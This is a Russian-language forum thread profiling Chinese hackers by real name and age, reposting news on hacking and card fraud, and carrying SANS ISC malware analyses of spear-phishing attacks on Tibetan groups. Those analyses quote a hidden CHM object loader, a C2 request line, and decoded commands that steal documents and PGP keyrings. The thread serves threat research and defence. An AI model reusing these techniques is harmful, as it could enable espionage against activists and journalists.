Перейти к содержанию

Небольшой экскурс в Чайна-таун (с продолжением)


Loo

Рекомендуемые сообщения

Есть уже тема про кЕтаЙтскую угрозу со стороны хакеров, ну собственно у них все как всегда не так как в остальном мире. То чего они понимают под своими расцветками, я все равно вьехать не могу :о)) Начнем с топа хакерофф:

 

Реальное имя: Gong Wei

Ник в тыртырнете: Goodwell, Goodwill, Goodwil

Соопчество: Green Army Corps isbase.net greenarmy.org/index.php

Возраст: 26

Самый известный взлом: Да ничего особенного, просто очень громкие эксплоиты к известным форумным движкам, движкам сайтов, CMS

Основатель Green Army Corps, член RedHackerAlliance

http://www.greenarmy.org/webpic/cctv1.jpg

 

 

Реальное: Wang Xianbing

Ник: Janker, Lonely Swordsman

janker.org

Возраст неизвестен

Учился в университете Zhenzhou (кампусовая сеть этого университета страшное место :о)) Закончил универ по специальностям Дизайн автомобилей и Бизнес-менеджмент в 2002 году. Инициатор и координатор в конфликте между японскими и китайскими хаксорами в 2000 году. Вроде как воевал с американцами, чем там кончилось непонятно. Приходил выпендриваться на IRC-канал, где много наших сидело. Опозорен (украли шеллы, затроянили машину) и опубликовали до фига нелицеприятной инфы. Был одним из первых секьюрити-консультантов в правительственных организациях кетая, в банках. Перемещался в зоне Shenzhen, Guanzhou, Shanghai и Beijing. Насколько я понимаю, это свободные экономические зоны. Агрессивен, нахален, расист (чес-чес! вот такой кетайцкий расист :о))

 

Настояще: Huang Xin

Ник: Glacier

Конторы: xfocus.org, blog.xfocus.net/index.php?blogId=15

Возраст: 30 в январе исполнилось

Самое известное китайское секьрити ПО сделал он. Вирусмейкер, в частности Glacier Trojan, он же приложил руку к X-scan

Учился в Xi’an Electronic Sci-Tech University. Был женат на девушке, основателе знаменитой и самой закрытой команды W.O.L.F (на тот момент :о))с ником Wollf. Меня так и не пустили никогда на сайт команды. Жил в Guangxi. Спокойный, уверенный, доброжелательный, опасный, именно его называют Крестным Отцом Вирусмейкерства в Китае. Очень достойный человек. Скорее всего работает на правительство (судя по многим факторам) Я бы его назвал Топ 1.

 

Реальное: Zhang Xinghu

Ник: Flyingfox

Сайт: 54hack.org

Возраст скорее всего около 20 сейчас :о))

Основатель China Youth Hackers Alliance. Хвалился что, "technical security advisor for a police station"

 

Ну и 3800hk.com Коммерческая организация с персоналом под 50 человек. Раньше были 3800cc.com Тем тко в тем СС сразу говорит о много. CC(Credit Card) Самая известная школа хакер0в в Китае. В 2003 году был первым кто в интервью рассказал, что "брал" Пентагон. Предлагал ФБР приехать и попробовать его арестовать

 

Вот такая публичная часть кетайских хакерофф :о))

Ссылка на комментарий
Поделиться на другие сайты

  • 2 недели спустя...

 

Chinese 'hacker' denies CNN report

 

Adjust font size:

The founder of a domestic hacker website has criticized a CNN report that claimed he was employed by the Chinese government to attack a United States government website, a Beijing newspaper reported today.

CNN claimed the central government has employed and paid several young operators of a website to "attack the world's most sensitive sites, including the Pentagon" in a report named "Chinese hackers: No site is safe" on March 7, Global Times said.

The CNN report said the interviewees, identified as Xiao Chen, admitted "they have hacked into the Pentagon and downloaded information," and was "paid secretly by the Chinese government" after doing so.

Xiao, the co-founder of Zhejiang-based website Hacker4.com for computer fans to exchange information, said he never said this to the journalist, said the Global Times, which is affiliated to People's Daily.

Shanghai Daily checked Hacker4.com and found most of its information concentrates on providing tips on how to prevent hacker attacks. It publicizes the loopholes of operating systems and teaches users how to recover from cyber viruses.

"The whole CNN report was groundless," Xiao Chen told the Global Times. They apparently wrote that for certain purposes, Xiao added. He spoke to Global Times to "clarify the case" after seeing the CNN report.

 

A journalsit from CNN sent more than 20 e-mails to set up an interview with Xiao, saying he just wanted to introduce his website, said Xiao in the report.

But the journalist kept asking whether he had accessed the Pentagon's website and if the Chinese government paid them.

He denied answering any questions like that, the Global Times report said.

 

"I have never had access to any overseas website, let alone attacked one," Xiao told the newspaper.

 

 

The US Department of Defense claimed Chinese hackers always attacked its government website in the Chinese Military Report on March 4. However, US-based information security system company Symantec reported that most hackers were in the United States and China is one of the victim countries, the Global Times report said.

(Shanghai Daily, March 11, 2008)

 

http://www.china.org.cn/china/national/200...nt_12264393.htm

 

Вообще прикольно конечно :о)) hack4 занимается защитой, типа оффициально. Так что кто его подставил, не очень понятно :о))

Ссылка на комментарий
Поделиться на другие сайты

Police have rounded up 38 people accused of running a credit card fraud ring out of Queens for almost a decade. Officials say hackers in China and Ukraine have been breaking into the databases of major U.S. department stores, and then sending the credit card information of thousands of shoppers to the ringleader, Kwok Chow, 36, a Flushing resident known as ”Tony.”

 

The scam hit approximately 3,000 consumers and may have cost as much as $1 million. Tony allegedly used the data to churn out thousands of bogus cards, which were distributed to a team of shoppers who would buy high-end merchandise to be resold at a discount a web site, Easttrades.com. (There are still lots of sweet deals there, too!) Tony’s crew also used the data to generate fake driver’s licenses, enabling them to purchase plane tickets under false identities, something Queens D.A. Richard Brown finds ”particularly disturbing.”

 

The arrests are the culmination of a 14-month probe, called House of Cards, which was initiated when a Flushing retailer spotted a fake driver’s license used by one of Chow's shoppers. After arresting that suspect, police began surveillance and tapped thousands of phone calls, which all had to be translated. And the overseas suspects are still at large; Commissioner Ray Kelly seemed none too optimistic about getting cooperation from the Chinese and Ukrainian governments: ”So far we haven't had much success at all.”

 

Last year police nabbed 13 people who were stealing credit card information from restaurant diners; the city's Department of Consumer Affairs has a lot of useful tips on how to guard against identity theft.

 

Вкратце если, то копы взяли какого-то Тони, которого называют королем преступного мира среди кардеров. Взяли в Куинсе, в Штатах. И "имели" они всю американскую систему, как хотели и как могли :о))) Ну вкупе с Украинскими "товарищами". Вот такой ынтернационал получился, прикольно что давно уже делят на Российских и Украинских хакеров :о))

Ссылка на комментарий
Поделиться на другие сайты

...имеют ВТО как хотят, с контрафактом и без.

:smile12:

Британскую полицию обвинили в краже российского ПО

 

"В последнее время нам стали поступать сообщения из Англии о том, что для снимков, сделанных автоматическими средствами слежения, используется нелицензионное программное обеспечение разработанное "Элекардом", - сообщил "Вебпланете" президент компании Андрей Поздняков. По его словам, это не первый случай посягания западных пиратов на разработки "Элекарда".

 

Г-н Поздняков рассказал, что обычно компания раздает тестовые версии MPEG-декодеров бесплатно с условием их некоммерческого использования в течение 21 дня. По истечении этого срока на экране монитора появляется бегущая строка "Evaluation period has expired. Please buy the Elecard MPEG Video decoder” ("Тестовый период окончен. Пожалуйста, купите Элекард MPEG видео декодер"). После этого любое, даже некоммерческое использование декодера, запрещено.

 

О том, что британская полиция использует программу уже после окончания тестового периода, стало известно из письма в компанию одного из нарушителей. "Я был сфотографирован на дороге предназначенной только для автобусов (район Bath & North East Somerset). В подтверждение мне прислали снимок из которого ясно, что он сделан с помощью нелицензионной копии Элекард МПЕГ декодера (так как на нем была надпись об окончании тестового периода).... Они используют демо версию для зарабатывания денег", - говорится в письме. "Недавно получил уведомление о штрафе. На фотографии были такие слова: Тестовый период окончен. Пожалуйста, купите Элекард МПЕГ видео декодер. Что по-видимому должно означать, что Совет города Камден (Camden Council) использовал программное обеспечение с просроченным периодом ...", - пишет другой британец.

 

По словам Андрея Позднякова, это не первый случай злоупотребления западными пользователями тестовой версии декодера. "Несколько лет назад наш нелицензионный декодер использовался компанией Adelphia (кабельный ТВ провайдер в США). У них в течение суток надпись о нелицензионном использовании нашего кодека шла в прямой эфир". Тогда в службу поддержки "Элекарда" обратились телезрители, решившие, что это от них требуется заплатить за использование декодера.

 

"Обычно в таком случае правообладатели пишут письмо нарушителю с требованием немедленно за все заплатить. Из таких стран, как Англия или Штаты, незамедлительно следует ответ типа: "Извините, случайно ошиблись, мы вам должны за ХХХ копий, выставьте нам счет и мы немедленно оплатим", - комментирует г-н Поздняков, - "В случае с американским провайдером они на письмо отреагировали незамедлительно и заплатитили за кодеки что были должны". Нарушители тогда отделались смешной суммой, при этом скандал обеспечил порядка 100 000 посещений сайта "Элекарда" за неделю.

 

Источник

Ссылка на комментарий
Поделиться на другие сайты

Вообще я не знаю, чего тут скрывать, но файлик с презенташкой этой постоянно отовсюду трут. Ревью атак китайцев и методология защиты Китайских сетей

China_Cyber___Fair_Use_1_.pdf

Ссылка на комментарий
Поделиться на другие сайты

  • 2 недели спустя...

еще информация

_ttp://isc.sans.org/diary.html?n&storyid=4177

Cyber attacks against Tibetan communities

Published: 2008-03-21,

Last Updated: 2008-03-22 12:26:51 UTC

by Maarten Van Horenbeeck (Version: 4)

There is lots of media coverage on the protests in Tibet. Something that lies under the surface, and rarely gets a blip in the press, are the various targeted cyber attacks that have been taking place against these various communities recently.

 

These attacks are not limited to various Tibetan NGOs and support groups. They have been reported dating back to 2002, and even somewhat before that, and have affected several other communities, including Falun Gong and the Uyghurs.

 

The attacks generally start with a very trustworthy looking e-mail, being spoofed as originating from a known contact, to someone within a community. Some impressive social engineering tricks are used:

 

Messages make a strong statement on a well known individual or group, but do not mention its name. The attachment is then named after that individual. A state of 'cognitive dissonance' is invoked between the reader's pre-existent beliefs and the statement. There's a natural urge to click on the attachment to confirm that belief;

The writing style of the purported sender is usually well researched to have the message look as believable as possible;

The content of the document actually matches closely what was discussed in the e-mail message;

Having legitimate, trusted, users actually forward along a message back into the community.

The messages contain an attachment which exploits a client side vulnerability. Generally these are:

 

CHM Help files with embedded objects;

Acrobat Reader PDF exploits;

Microsoft Office exploits;

LHA files exploiting vulnerabilities in WinRAR;

Exploitation of an ActiveX component through an attached HTML file.

Here's a sample attachment and its AV coverage at the time it was distributed:

 

reports_of_violence_in_tibet.ppt

MD5 977a4ac91acf5d88044a68f828154155

 

AhnLab-V3 2008.3.20.2 2008.03.20 -

AntiVir 7.6.0.75 2008.03.20 EXP/Office.Dropper.Gen

Authentium 4.93.8 2008.03.20 -

Avast 4.7.1098.0 2008.03.20 MPPT97:CVE-2006-3590

AVG 7.5.0.516 2008.03.20 -

BitDefender 7.2 2008.03.20 Exploit.PPT.Gen

CAT-QuickHeal 9.50 2008.03.20 -

ClamAV 0.92.1 2008.03.20 -

DrWeb 4.44.0.09170 2008.03.20 -

eSafe 7.0.15.0 2008.03.18 -

eTrust-Vet 31.3.5629 2008.03.20 -

Ewido 4.0 2008.03.20 -

F-Prot 4.4.2.54 2008.03.19 File is damaged

F-Secure 6.70.13260.0 2008.03.20 -

FileAdvisor 1 2008.03.20 -

Fortinet 3.14.0.0 2008.03.20 -

Ikarus T3.1.1.20 2008.03.20 -

Kaspersky 7.0.0.125 2008.03.20 -

McAfee 5256 2008.03.20 -

Microsoft 1.3301 2008.03.20 -

NOD32v2 2964 2008.03.20 PP97M/TrojanDropper.Agent.NAI

Norman 5.80.02 2008.03.20 -

Panda 9.0.0.4 2008.03.20 -

Prevx1 V2 2008.03.20 -

Rising 20.36.32.00 2008.03.20 -

Sophos 4.27.0 2008.03.20 -

Sunbelt 3.0.978.0 2008.03.18 -

Symantec 10 2008.03.20 -

TheHacker 6.2.92.250 2008.03.19 -

VBA32 3.12.6.3 2008.03.17 -

VirusBuster 4.3.26:9 2008.03.20 -

Webwasher-Gateway 6.6.2 2008.03.20 Exploit.Office.Dropper.Gen

 

As you can see, Anti virus is generally not proving effective against the samples distributed in this ongoing attack. We often see similar samples returning, only to have been edited slightly to prevent them from being picked up.

 

Most of the time, the samples then drop very raw trojans not restricted much in ability. This means that only investigating the trojan does not always reveal the data targeted. To investigate, it's necessary to find out which commands were submitted So far, we have uncovered attacks that specifically searched the file system for Word documents, e-mail contents and, most interestingly PGP keyrings.

 

If you’re interested in this, you may like to read Crouching Powerpoint, Hidden Trojan, a presentation I gave earlier in the year on similar attacks against Falun Gong. Brian Krebs at the Washington Post has also written on the unfolding events. Mikko at F-Secure, Sophos and McAfee AVERT also have very interesting blog postings up on the topic.

 

We've been working with several groups on these attacks since early 2007. If you or your organization has also been targeted, now or in the past, please get in touch. We will not publish any data on your specific attacks without your permission.

 

--

Ссылка на комментарий
Поделиться на другие сайты

и еще продолжение - http://isc.sans.org/diary.html?n&storyid=4177

 

This hopefully helps you identify the risk similar attacks would pose to your organization. The diary does not deal with one incident, but looks at overall findings.

1. The message

 

The sole goal of the message is to transport the exploit, and to convince the reader to click on it, so the malicious code can execute.

 

Several social engineering tricks have been seen:

 

* Messages make a strong statement on a well known individual or group, but do not mention its name. The attachment is then named after that individual. A state of 'cognitive dissonance' arises between the reader's pre-existent beliefs and the statement. This urges the reader to click the message;

* The writing style of the purported sender is well researched and mimicked;

* The content of the document matches the topic of the e-mail message;

* Legitimate, trusted, users are sometimes convinced to actually forward along a message back to specific targets;

* In a number of cases, “memes” distributed within the community have been reused. For instance, in a “viral” Word document was grabbed from a forum, edited to include the exploit and Trojan code, and forwarded onto other members of the community.

 

Here’s a sample. This message was sent to someone very active within the Tibetan community, and was spoofed as originating from the Secretary of International Relations of the Central Tibetan Administration, the government in exile in Dharamshala, India. The name and contact details of the official were accurate:

 

All,

 

Attached here is the update Human Rights Report on Tibet issued by

Department of State of U.S.A on March 11, 2008.

 

You may also visit the site:

 

Tashi Deleg,

 

Sonam Dagpo

 

Secretary of International Relations

Department of Information & International Relations

Central Tibetan Administration

Dharamshala -176215

H.P., INDIA

Ph.: [obfuscated]

Fax: [obfuscated]

E-mail: [obfuscated]@gov.tibet.net or diir-pa@gov.tibet.net

Website: http://www.tibet.net/en/diir/

 

 

In some cases, messages were sent which addressed the recipient by his first name, and provided “clarification on a topic” which had previously been discussed between the sender and the recipient. While not evidence, there are specific instances in which it appears previously compromised accounts were re-used to engage in better social engineering.

2. The exploit

 

The messages contain an attachment which exploits a client side vulnerability. The most common vectors so far have been:

 

* CHM Help files with embedded objects;

* CVE-2008-0655: Acrobat Reader PDF exploit

* CVE-2006-2492, CVE-2007-3899: Word

* CVE-2006-3590, CVE-2006-0009: Powerpoint

* CVE-2008-0081: Excel

* CVE-2005-0944: Microsoft Access

* CVE-2006-3845: LHA files exploiting vulnerabilities in WinRAR.

 

The file exploits the vulnerability, and executes shellcode which generally unpacks at least two embedded components:

 

* The actual Trojan binary: Which can be packed (using UPX, Armadillo, FSG or PE-ARMOR), but in most cases is unpacked and easily retrievable from the file. It is described further in chapter 3 of this diary entry.

* A benign, non-malicious document of the same file type: upon successful execution of the exploit code, it generally “cleans up” and instead of showing an indication that the application has crashed, it drops a clean file to disk (be it either RAR, DOC, PPT or any of the other files affected) and opens it.

 

The second file shows context very valid to the message initially sent. An example image is included for reference below. This was grabbed from what was sent as a promotional flyer on a book on Tibet. In the background, it dropped a Trojan. Both the flyer and the book exist in real-life form, unbugged. This was an example of taking something which "exists" within the community, and republishing it with trojaned contents.

 

hese files usually have very low AV coverage. Below is sample Virustotal output for the malicious PDF sample:

 

China’s Tibet.pdf

MD5 70d0d15041a14adaff614f0b7bf8c428

 

AhnLab-V3 2008.3.22.1 2008.03.21 -

AntiVir 7.6.0.75 2008.03.21 -

Authentium 4.93.8 2008.03.20 -

Avast 4.7.1098.0 2008.03.21 -

AVG 7.5.0.516 2008.03.21 -

BitDefender 7.2 2008.03.21 -

CAT-QuickHeal 9.50 2008.03.20 -

ClamAV 0.92.1 2008.03.21 -

DrWeb 4.44.0.09170 2008.03.21 -

eSafe 7.0.15.0 2008.03.18 -

eTrust-Vet 31.3.5631 2008.03.21 -

Ewido 4.0 2008.03.21 -

F-Prot 4.4.2.54 2008.03.20 -

F-Secure 6.70.13260.0 2008.03.21 -

FileAdvisor 1 2008.03.21 -

Fortinet 3.14.0.0 2008.03.21 -

Ikarus T3.1.1.20 2008.03.21 -

Kaspersky 7.0.0.125 2008.03.21 -

McAfee 5257 2008.03.21 -

Microsoft 1.3301 2008.03.21 -

NOD32v2 2966 2008.03.21 -

Norman 5.80.02 2008.03.20 -

Panda 9.0.0.4 2008.03.21 -

Prevx1 V2 2008.03.21 -

Rising 20.36.42.00 2008.03.21 -

Sophos 4.27.0 2008.03.21 Mal/JSShell-B

Sunbelt 3.0.978.0 2008.03.18 -

Symantec 10 2008.03.21 -

TheHacker 6.2.92.250 2008.03.19 -

VBA32 3.12.6.3 2008.03.21 -

VirusBuster 4.3.26:9 2008.03.21 Exploit.PDF.A

Webwasher-Gateway 6.6.2 2008.03.21 Exploit.PDF.ZoneBac.gen (suspicious)

 

 

3. The backdoor

 

Upon successful exploitation, the dropper installs a Trojan. We have monitored over 8 different Trojan families in use. Quite common are Enfal, Riler and Protux. In addition, control over some machines is maintained using the Gh0st RAT remote access tool.

 

These trojans generally allow close to unrestricted access to the system under the user account which installed the Trojan. Many machines involved in this incident are home desktops, as such this is often the administrator account. The Backdoor generally triggers a few generic signatures, but has very low AV coverage at the time of distribution.

 

Below is a sample extracted from a malicious Excel document:

 

event_0310_result.exe

MD5 7d62cec8f022e9599885ad7d079d2f60

 

AhnLab-V3 2008.3.4.0/20080310 found nothing

AntiVir 7.6.0.73/20080310 found [HEUR/Malware]

Authentium 4.93.8/20080307 found nothing

Avast 4.7.1098.0/20080309 found nothing

AVG 7.5.0.516/20080310 found nothing

BitDefender 7.2/20080310 found nothing

CAT-QuickHeal 9.50/20080308 found nothing

ClamAV None/20080310 found nothing

DrWeb 4.44.0.09170/20080310 found nothing

eSafe 7.0.15.0/20080309 found nothing

eTrust-Vet 31.3.5597/20080307 found nothing

Ewido 4.0/20080310 found nothing

F-Prot 4.4.2.54/20080309 found nothing

F-Secure 6.70.13260.0/20080310 found [suspicious:W32/Malware!Gemini]

FileAdvisor 1/20080310 found nothing

Fortinet 3.14.0.0/20080310 found nothing

Ikarus T3.1.1.20/20080310 found nothing

Kaspersky 7.0.0.125/20080310 found nothing

McAfee 5247/20080307 found nothing

Microsoft 1.3301/20080310 found nothing

NOD32v2 2935/20080310 found nothing

Norman 5.80.02/20080307 found nothing

Panda 9.0.0.4/20080309 found nothing

Prevx1 V2/20080310 found [Heuristic: Suspicious Self Modifying File]

Rising 20.35.02.00/20080310 found nothing

Sophos 4.27.0/20080310 found [Mal/Behav-116]

Sunbelt 3.0.930.0/20080305 found nothing

Symantec 10/20080310 found nothing

TheHacker 6.2.92.239/20080309 found nothing

VBA32 3.12.6.2/20080305 found nothing

VirusBuster 4.3.26:9/20080309 found nothing

Webwasher-Gateway 6.6.2/20080310 found [Heuristic.Malware]

 

 

4. The control connection

 

In order for the Trojan to be effective, it needs to “phone home”. This usually (but not always) consists of two steps:

 

* A DNS lookup to acquire the address of the control server;

* The actual connection.

 

The DNS lookup occurs for a hostname embedded in the Trojan. So far, we have tracked over 50 unique hostnames. Some are used against a single organization or individual, others are used across the spectrum to many different targets.

 

Interestingly, attacks are “timed”. Let’s look at some DNS resolution logs:

 

+ 2008-03-22 06:05 | dns3.westcowboy.com | 210.162.89.242

- 2008-03-22 06:05 | dns3.westcowboy.com | 127.0.0.1

+ 2008-03-22 15:07 | dns3.westcowboy.com | 127.0.0.1

- 2008-03-22 15:07 | dns3.westcowboy.com | 210.162.89.242

+ 2008-03-23 07:18 | dns3.westcowboy.com | 210.162.89.242

- 2008-03-23 07:18 | dns3.westcowboy.com | 127.0.0.1

+ 2008-03-23 09:54 | dns3.westcowboy.com | 127.0.0.1

- 2008-03-23 09:54 | dns3.westcowboy.com | 210.162.89.242

 

When the hostname resolves to one of the above IP addresses, a connection is set up. When it resolves to 127.0.0.1 however, the compromised machine will no longer connects out.

 

As several IDS rules are available to trigger on lookups that result in 127.0.0.1, we are also seeing samples that contain a check for a specific ‘code’ IP. When the control server resolves to this address, the Trojan holds for a few minutes, then does another lookup. These “parking addresses” have included 43.44.43.44 and 63.64.63.64.

 

In the above example, this indicates that the team behind these attacks was busy gathering data from 06:05 till 15:07, only to start again almost exactly one day later, 07:18.

 

In a few cases, the control connection has been regular HTTP or HTTPS, set up using code injected into the Internet Explorer process. This allows the Trojan to be proxy-aware. In other instances, there have been control connections that were fully binary (such as Gh0st RAT) or encrypted using an obvious XOR key.

 

Some control connections can be detected on the network or proxy level, such as those of certain Riler and Enfal families:

 

When started, Enfal issues HTTP POST requests to the controller for:

 

/cgi-bin/Owpq4.cgi

/cgi-bin/Fupq9.cgi

 

The Riler Trojan family can also be identified through its connection protocol (bold is the infected client submitting data):

 

NAME:

NAME: [hostname].VER: Stealt h 2.6 MARK: fl510 OS: NT 5.0.L_IP: 10. 2.0.18.ID: NoID.

LONG:0501_LOG.txt

NULL

AUTO

ERR code = 02

SNIF

ERR code = 02

WAKE

WAKE

 

It also has a recognizable command set:

 

LOCK SEND WAKE NAME MOON KEEP DISK FILE

DONE DOWN LONG MAKE ATTR KILL LIKE SEEK

READ DEAD DDLL AUTO READY

 

 

5. The control server

 

The vast majority of control servers were identified on Chinese netblocks. However, servers have been identified in the USA, South Korea and Taiwan. The host names pointing to these servers are often configured on dynamic DNS services such as 3322.org. While these services in themselves are not malicious, they are heavily used in these specific attacks.

 

At the moment, it appears at least a number of the control servers have been compromised using open Terminal Services (RDP/3389) combined with weak passwords.

 

 

 

Based on the technical data, it is impossible to say who is the culprit in these attacks. What is however clear is that these NGOs are systematically hampered using malicious code, either with as goal to gain access to their communications, or to make them reluctant to use e-mail to begin with.

 

While this is not the full picture on the attacks, we hope this overview already proves useful, and please get in touch if you have questions or additional feedback.

 

Cheers,

 

Maarten Van Horenbeeck

Maarten at daemon.be

Ссылка на комментарий
Поделиться на другие сайты

а вот как воруют ключи PGP ;-)

 

_ttp://isc.sans.org/diary.html?n&storyid=4207

 

Guarding the guardians: a story of PGP key ring theft

Published: 2008-03-27,

Last Updated: 2008-03-27 09:07:04 UTC

by Maarten Van Horenbeeck (Version: 1)

0 comment(s)

 

A couple of weeks ago, we received a CHM, or Windows Help file, embedded in e-mail as part of a targeted attack campaign against an NGO. Virus detection was near zero. On Virustotal.com, two solutions actually flagged it as malicious.

 

After decompiling the CHM file, which you can easily do using tools such as arCHMage or chmdecompiler, I spotted the following code in the HTML content, in addition to an executable ‘music.exe’:

 

object width="0" height="0" style="display:none;"

type="application/x-oleobject" codebase="music.exe"

 

The goal of this code is to load a hidden object from the CHM container. This embedded file also was not recognized by the vast majority of anti virus vendors. The code connected to a ‘fake’ web server at a Hong Kong ISP, and issued the following request:

 

GET /scripts/msadce.exe/?UID=DD01x51 HTTP/1.0

 

When you see something like this, it raises suspicion that the UID is in fact a ‘command’ to a control server. In reality, the web server turned out not a web server at all. Any query but the above was answered with an immediate disconnect. In response to the above request, the server responded with a large BASE64 encoded response, which turned out to be an additional executable file. The trojan then executed this file, being its second stage payload.

 

This file subsequently connected to a second server, being the actual control server. It sent an identical registration URI as above to this machine. In return, the server responded with another BASE64 encoded string. This was much shorter, and once decoded, turned out to be:

 

<Command Begin>

netmgetr usb:\*.doc

netmgetr usb:\*.pkr

netmgetr usb:\*.skr

netlsr usb:\*.*

<Command End>

 

Upon further review of the trojan code, netmgetr scanned the file system for a filename and then copies it from the system. This is interesting, because reports of malware looking for PGP keyrings (the .skr and .pkr files in the above example) are rare. There have been instances, such as the ’99 Caligula macro-virus, but this was more proof-of-concept code.

 

In this case, the code above was combined with a keylogger, so the passphrase could have been grabbed as well. However, we did not see this happening. It appears the attacker's goal was to ”map” who was talking to whom encrypted. In this attack, the latter information appears to have been actively used to send malware to other people in a more convincing way.

 

There are two things we can learn from this:

 

* It’s clear that we should understand that the network that houses our data is not just a network of machines. It’s a network of people. Knowing who talks to whom and how is valuable help for an attacker in selecting his next targets, and making them look "normal";

* When we use strong encryption, attackers will not try to "break" that encryption. They will move to the endpoints to steal the keys that are used to encrypt it. Ensure sufficient security is implemented on key storage.

 

Cheers,

 

Maarten Van Horenbeeck

maarten at daemon.be

Ссылка на комментарий
Поделиться на другие сайты

Заархивировано

Эта тема находится в архиве и закрыта для дальнейших ответов.

×
×
  • Создать...